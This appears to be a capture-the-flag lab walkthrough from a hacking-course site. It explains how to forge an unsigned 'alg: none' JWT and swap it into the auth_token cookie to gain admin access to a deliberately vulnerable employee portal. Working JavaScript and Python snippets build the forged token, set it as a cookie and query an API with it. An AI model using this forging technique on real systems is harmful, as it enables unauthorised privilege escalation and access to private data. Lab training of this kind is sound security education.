This corporate employee portal relies on JWT cookies to manage user sessions and access controls, but the developers made some critical security assumptions. 🔐 What appears to be a secure authentication system might just be waiting for the right manipulation to unlock administrative privileges. 💡 Master the art of JWT token forging and discover how a simple cookie modification can grant you access to the company's most sensitive data! 🕵️
Navigate to
to access the corporate employee portal. You'll see a login form where you can authenticate as a regular employee.
Use the provided test credentials to login (admin login is disabled for security):
After successful login, you'll be redirected to the employee dashboard where you can see basic employee information but no administrative functions. Note that direct admin login is not possible - you must use JWT manipulation.
Open browser Developer Tools (F12) and examine the cookies. You'll find an authentication cookie named auth_token
containing a JWT. Copy this token and analyze its structure.
Decode the JWT payload (middle section) using Base64 decoding. You can use online tools like jwt.io or browser console:
// In browser console
let payload = 'eyJ1c2VyIjoiZW1wbG95ZWUiLCJyb2xlIjoiZW1wbG95ZWUiLCJleHAiOjE2OTQ1MjQ4MDB9';
console.log(JSON.parse(atob(payload)));
The decoded payload reveals:
{
"user": "employee",
"role": "employee",
"exp": 1694524800
}
The key vulnerability is that the application accepts JWT tokens with "alg": "none"
in the header, which means no signature verification is performed. This allows us to forge tokens without knowing the secret key.
Create a new JWT with administrative privileges:
// Step 1: Create new header with 'none' algorithm
let newHeader = {
"typ": "JWT",
"alg": "none"
};
// Step 2: Create new payload with admin role
let newPayload = {
"user": "admin",
"role": "admin",
"exp": Math.floor(Date.now() / 1000) + 3600
};
// Step 3: Encode both parts
let encodedHeader = btoa(JSON.stringify(newHeader)).replace(/=/g, '');
let encodedPayload = btoa(JSON.stringify(newPayload)).replace(/=/g, '');
// Step 4: Create forged JWT (no signature needed for 'none' algorithm)
let forgedJWT = encodedHeader + '.' + encodedPayload + '.';
console.log('Forged JWT:', forgedJWT);
In the browser Developer Tools:
auth_token
cookie/admin
Alternatively, use the console:
// Replace the cookie with forged JWT
document.cookie = 'auth_token=' + forgedJWT + '; path=/';
// Refresh the page
location.reload();
After replacing the cookie, you should now have access to administrative functions. Navigate to /admin
or look for admin menu options that weren't visible before.
In the admin panel at /admin
, you'll find several sections:
The flag is located in the System Secrets section under Security Token. It will be displayed as a UUID format flag.
# Using Python
import base64
import json
header = {"typ": "JWT", "alg": "none"}
payload = {"user": "admin", "role": "admin", "exp": 1694524800}
encoded_header = base64.b64encode(json.dumps(header).encode()).decode().rstrip('=')
encoded_payload = base64.b64encode(json.dumps(payload).encode()).decode().rstrip('=')
forged_jwt = f"{encoded_header}.{encoded_payload}."
print(forged_jwt)
// Check user info with forged JWT
fetch('/api/user-info', {
headers: {
'Cookie': 'auth_token=' + forgedJWT
}
}).then(r => r.json()).then(console.log);
Sign-in to your account to access your hacking courses and cyber security labs.
Access all hacking courses and cyber security labs.